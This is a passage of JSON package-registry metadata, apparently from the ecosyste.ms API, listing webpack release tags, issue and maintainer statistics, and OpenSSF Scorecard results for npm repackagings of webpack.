1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-09-01T02:02:41.588Z","dependent_packages_count":2,"downloads":11,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":48.293345595762524,"dependent_repos_count":25.32799796580169,"dependent_packages_count":9.4821380216761,"stargazers_count":0.08499011129127237,"forks_count":0.5289098337806207,"average":16.74347630566244},"purl":"pkg:npm/%40zhuowenli/miniapp-webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@zhuowenli/miniapp-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@zhuowenli/miniapp-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@zhuowenli/miniapp-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T19:17:33.706Z","issues_count":10170,"pull_requests_count":9468,"avg_time_to_close_issue":10847458.413030302,"avg_time_to_close_pull_request":2764488.9421997755,"issues_closed_count":9900,"pull_requests_closed_count":8910,"pull_request_authors_count":1445,"issue_authors_count":6691,"avg_comments_per_issue":5.832251720747296,"avg_comments_per_pull_request":3.1891634980988592,"merged_pull_requests_count":6045,"bot_issues_count":8,"bot_pull_requests_count":2916,"past_year_issues_count":85,"past_year_pull_requests_count":955,"past_year_avg_time_to_close_issue":839618.0847457628,"past_year_avg_time_to_close_pull_request":356132.6119205298,"past_year_issues_closed_count":59,"past_year_pull_requests_closed_count":755,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":67,"past_year_avg_comments_per_issue":3.2823529411764705,"past_year_avg_comments_per_pull_request":4.964397905759163,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":141,"past_year_merged_pull_requests_count":601,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":178,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":130,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":38,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":452,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":85,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"TheLarkInn","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@zhuowenli%2Fminiapp-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@zhuowenli%2Fminiapp-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@zhuowenli%2Fminiapp-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@zhuowenli%2Fminiapp-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@zhuowenli%2Fminiapp-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@zhuowenli%2Fminiapp-webpack/codemeta","maintainers":[{"uuid":"caigua","login":"caigua","name":null,"email":"1270155919@qq.com","url":null,"packages_count":31,"html_url":"https://www.npmjs.com/~caigua","role":null,"created_at":"2022-11-11T06:52:38.149Z","updated_at":"2022-11-11T06:52:38.149Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/caigua/packages"},{"uuid":"zwlo","login":"zwlo","name":null,"email":"zhuowenligg@gmail.com","url":null,"packages_count":29,"html_url":"https://www.npmjs.com/~zwlo","role":null,"created_at":"2022-11-11T06:52:38.176Z","updated_at":"2022-11-11T06:52:38.176Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/zwlo/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1721848,"name":"fis-msprd-webpack_1_13_1","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jade, coffee, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2016-12-25T12:59:08.862Z","latest_release_published_at":"2016-12-25T12:59:08.862Z","latest_release_number":"1.13.1","last_synced_at":"2026-09-03T00:55:19.877Z","created_at":"2022-04-09T15:38:45.101Z","updated_at":"2026-09-03T00:55:19.877Z","registry_url":"https://www.npmjs.com/package/fis-msprd-webpack_1_13_1","install_command":"npm install fis-msprd-webpack_1_13_1","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.13.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using 